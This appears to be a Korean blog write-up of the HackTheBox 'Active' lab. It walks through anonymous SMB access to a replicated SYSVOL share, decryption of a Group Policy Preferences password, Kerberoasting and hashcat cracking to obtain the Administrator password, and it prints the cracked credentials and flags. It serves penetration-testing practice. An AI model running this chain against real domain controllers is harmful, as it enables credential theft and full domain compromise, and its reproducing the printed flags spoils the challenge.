Challenge Information
Enumeration & Attack Planning
Network
──(root㉿kali)-[~/Desktop/htb]
└─# nmap -sV 10.10.10.100
Starting Nmap 7.94 ( https://nmap.org ) at 2024-07-02 01:12 EDT
Stats: 0:00:26 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 52.94% done; ETC: 01:13 (0:00:14 remaining)
Nmap scan report for 10.10.10.100
Host is up (0.24s latency).
Not shown: 983 closed tcp ports (reset)
PORT STATE SERVICE VERSION
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-02 05:13:05Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 74.45 seconds
┌──(root㉿kali)-[~/Desktop/htb]
└─# nmap 10.10.10.100 -p 5985
Starting Nmap 7.94 ( https://nmap.org ) at 2024-07-02 01:22 EDT
Nmap scan report for 10.10.10.100
Host is up (0.24s latency).
PORT STATE SERVICE
5985/tcp closed wsman
Nmap done: 1 IP address (1 host up) scanned in 0.63 secondsdomain, kerberos, ldap 포트가 열려 있는 것을 보니 domain controller 같다.
domain은 active.htb 다.
WinRM은 닫혀있다.
smb
┌──(root㉿kali)-[~/Desktop/htb]
└─# crackmapexec smb 10.10.10.100 -u '' -p '' --shares
SMB 10.10.10.100 445 DC [*] Windows 6.1 Build 7601 x64 (name:DC) (domain:active.htb) (signing:True) (SMBv1:False)
SMB 10.10.10.100 445 DC [+] active.htb\:
SMB 10.10.10.100 445 DC [+] Enumerated shares
SMB 10.10.10.100 445 DC Share Permissions Remark
SMB 10.10.10.100 445 DC ----- ----------- ------
SMB 10.10.10.100 445 DC ADMIN$ Remote Admin
SMB 10.10.10.100 445 DC C$ Default share
SMB 10.10.10.100 445 DC IPC$ Remote IPC
SMB 10.10.10.100 445 DC NETLOGON Logon server share
SMB 10.10.10.100 445 DC Replication READ
SMB 10.10.10.100 445 DC SYSVOL Logon server share
SMB 10.10.10.100 445 DC Users SMB Null Access를 시도해보니 성공했고 Share List까지 얻을 수 있었다.
Replication라는 Share에 READ 권한이 있다는 것을 확인해 접속해보기로 했다.
┌──(root㉿kali)-[~/Desktop/htb]
└─# smbclient //10.10.10.100/Replication
Password for [WORKGROUP\root]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
active.htb D 0 Sat Jul 21 06:37:44 2018
10459647 blocks of size 4096. 5734868 blocks available
smb: \> cd active.htb
smb: \active.htb\> dir
. D 0 Sat Jul 21 06:37:44 2018
.. D 0 Sat Jul 21 06:37:44 2018
DfsrPrivate DHS 0 Sat Jul 21 06:37:44 2018
Policies D 0 Sat Jul 21 06:37:44 2018
scripts D 0 Wed Jul 18 14:48:57 2018
10459647 blocks of size 4096. 5734868 blocks available
smb: \active.htb\> cd ..
smb: \> lcd ./smb/
smb: \> prompt
smb: \> recurse
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)폴더 구조를 보니 SYSVOL 폴더인 것 같다.
SYSVOL 폴더를 복제했는데 권한 설정이 잘못되어 모든 사용자에게 노출된다는 시나리오로 추정된다.
일단 모든 내용들을 로컬로 가져왔다.
💡 Sysvol 폴더는 Domain Controller에 기본적으로 존재하는 공유 폴더로 AD에서 중요한 역할을 한다. GPO, Logon Script 배포 등이 해당 폴더를 통해 이뤄진다.
Exploit (Initial Access)
┌──(root㉿kali)-[~/Desktop/htb/Active2/smb]
└─# find -name *.xml
./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
┌──(root㉿kali)-[~/Desktop/htb/Active2/smb]
└─# cat ./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User>
</Groups>
┌──(root㉿kali)-[~/Desktop/htb/Active2/smb]
└─# gpp-decrypt "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
GPPstillStandingStrong2k18Sysvol의 모든 내용물을 열람할 수 있기에 혹시 gpp가 존재하나 싶어 xml 파일을 찾아봤다.
그 결과 SVC_TGS 유저의 (encrypted) gpp password를 얻을 수 있었고 decrypt하여 비밀번호를 획득했다.
비밀번호의 내용은 GPP가 아직도 real world에 많이 존재한다는 사실을 상기시켜주는 것 같다. :)
💡 최신 버전에서는 비활성화 됐지만, 옛날 버전에서는 예약 작업 생성, 모든 머신의 로컬 관리자 암호 변경 등과 같은 자동화 작업을 중앙에서 쉽게 수행하기 위해 “Group Policy Preferences(GPP)” 기능을 도입했다. 편리한 기능이지만 작업 수행을 위해 필요한 Credential이 Sysvol 폴더의 xml 파일에 AES-256으로 암호화되어 저장되고 이 키는 MSDN에 공개되어 있기 때문에 열람이 가능하다면 Credential을 해독할 수 있다.
위에서 xml 확장자의 파일을 검색한 이유가 바로 이 때문이다.
gpp-decrypt는 MSDN에 공개된 AES-256 Key로 복호화를 수행해준다.
참고: https://rootdse.org/posts/active-directory-basics-3/
┌──(root㉿kali)-[~/Desktop/htb/Active2]
└─# smbclient //10.10.10.100/Users -U SVC_TGS%GPPstillStandingStrong2k18
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Sat Jul 21 10:39:20 2018
.. DR 0 Sat Jul 21 10:39:20 2018
Administrator D 0 Mon Jul 16 06:14:21 2018
All Users DHSrn 0 Tue Jul 14 01:06:44 2009
Default DHR 0 Tue Jul 14 02:38:21 2009
Default User DHSrn 0 Tue Jul 14 01:06:44 2009
desktop.ini AHS 174 Tue Jul 14 00:57:55 2009
Public DR 0 Tue Jul 14 00:57:55 2009
SVC_TGS D 0 Sat Jul 21 11:16:32 2018
10459647 blocks of size 4096. 5728424 blocks available
smb: \> cd SVC_TGS\Desktop
smb: \SVC_TGS\Desktop\> get user.txt
getting file \SVC_TGS\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
┌──(root㉿kali)-[~/Desktop/htb/Active2]
└─# cat user.txt
ed7a69c488540caa823d0ffeadd0aad4smb users share를 통해 user flag를 획득했다.
user flag: ed7a69c488540caa823d0ffeadd0aad4
Post-Exploit
Surveying
┌──(root㉿kali)-[~/Desktop/htb/Active2]
└─# impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
Impacket v0.11.0 - Copyright 2023 Fortra
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ----------
active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 15:06:40.351723 2023-11-07 19:02:31.084947
[-] CCache file is not found. Skipping...
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$0ae35f4788b2c93d50f36d9594d7743a$6d5fc65c178da9ae0679e36fcfbfbfabecc9d7c2c7d67c212647bfd2e7b6dcd588de5d45aef126c173081a24ba6027dc8709d9305e0d19f1cbcc0516e0133c6c5402ddd65eaee08238d6a963c982f98c3b70095053f31d416a577a24caf9198b8756ac2429f8c2725bdb2a510f84d2605b1ffde9c076738aba426cfa244c45c371203fa9b8f5aa680442a35cff1c3ac51b47bf165e3523a934a0809d12a8ea8610d5a488ef9044e01bf74196ccdc80688eb31c6285b330d62cd6d43bc2e85ad84227c26dc8725edffe5a87d2f20bce62ffc12f6746ad5630970d6a211c4b343f2dff14f976265b222f548ba4efc4fb49d44e71dc68dc552e64d0039d47c21c038b2d6808bda90dfde7a1e517252c074a8bbe2adf00ec81fb03b360b984b61f2d162f1a03863bf4ad606d14965bdc5e004c14e90941c61804d525856f0e585c1b8b14adbb9f20a20d74d1daaaf826b4db69dcc9377c32981cce644848b9d35c5f1b4c66065cfbbe40e179f6a45f140d59c1e6c0f3aa2acf01503dda1ff492ef6777214a6c7d9b2811b494a897befad221bae659c5aa73e1caefc55aaba67eadcd92a6d6c659832a7d99eaec96f0165b3d1564491f75a3749536c3981520593e4f1a87f96f2a7d7e6e01a3eb9e7b10e7bf05f1a3db393a687e8151e72f944a631fbbbbb61e4fa85b76574fe67d0f5fc7242ed75e362517ef6f6f5713020b1b1b9675ef74fb0ac3256b89ac858137106cf618ab289fbfdc448220a4bf300a50b53d555befc193ce866efe313938245ac90a04d1cfbb49291d471e6400c5027583acdeb55e0a0f4ebeb7ba3a1bfe9675920e610bb9ce530b713a5bb2ba429e38e1ded8ace35b0a77ff4875036582ecc9111775b44142050dc8f41595da7b63c2a7bda5b539328e34c583c4a29beaa1d06b3a208cd88e7ea341dadccb7997f2536ac48ff0076fc43856417b08053d7ad094f3b3f8cbe2e2ed65ecf4fe7031d6bfecaa6631decebc1db14836db38de83f26afff727fabc6c7859e743715860c5ad033c9b6a302b9562ebaddbf65f7363f68ada9adfee8bfc0fcbd133b261d13b5831790a30936e17148d58d43173cd4a81b166b19842c5e41c12d81941ab2844a2679ebb9ad4000f97ae35d0927489618f8a0defacbd26207a894c4271b21b8d84a6263785dd83443fcf2a324f63bfdf3410b3129dad95883d1548262b34ba1ac6b769e1c25a01142cf8ac1ea6f96c2c8cc82c2042e59c0de533eb0721
┌──(root㉿kali)-[~/Desktop/htb/Active2]
└─# hashcat -a 0 tgt /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
<SNIP>:Ticketmaster1968Kerberoasting 공격 시도는 성공했고 운좋게 Administrator의 TGT 값을 획득했다.
또한 hashcat으로 복호화에 성공해 평문 비밀번호를 획득했다.
Privilege Escalation
┌──(root㉿kali)-[~/Desktop/htb/Active2/smb]
└─# smbclient -U "Administrator%Ticketmaster1968" //10.10.10.100/Users
Try "help" to get a list of possible commands.
smb: \> cd Administrator\Desktop\
smb: \Administrator\Desktop\> get root.txt
getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \Administrator\Desktop\> ^C
┌──(root㉿kali)-[~/Desktop/htb/Active2/smb]
└─# cat root.txt
19dce8ccdb0dc1ef84308167dfd88884획득한 administrator credential로 Users Share에 접속해 root flag를 획득했다.
root flag: 19dce8ccdb0dc1ef84308167dfd88884
💡 만약 os command를 실행하고 싶다면 wmiexec, smbexec, atexec 등의 기법을 사용하면 된다.
impacket과 crackmapexec에 기능이 있다!
'Wargame > HackTheBox' 카테고리의 다른 글
| [AD] Support (0) | 2024.10.07 |
|---|---|
| [Windows] Access (0) | 2024.08.06 |
| [AD] Sauna (2) | 2024.07.16 |
| [AD] Forest (1) | 2024.06.14 |
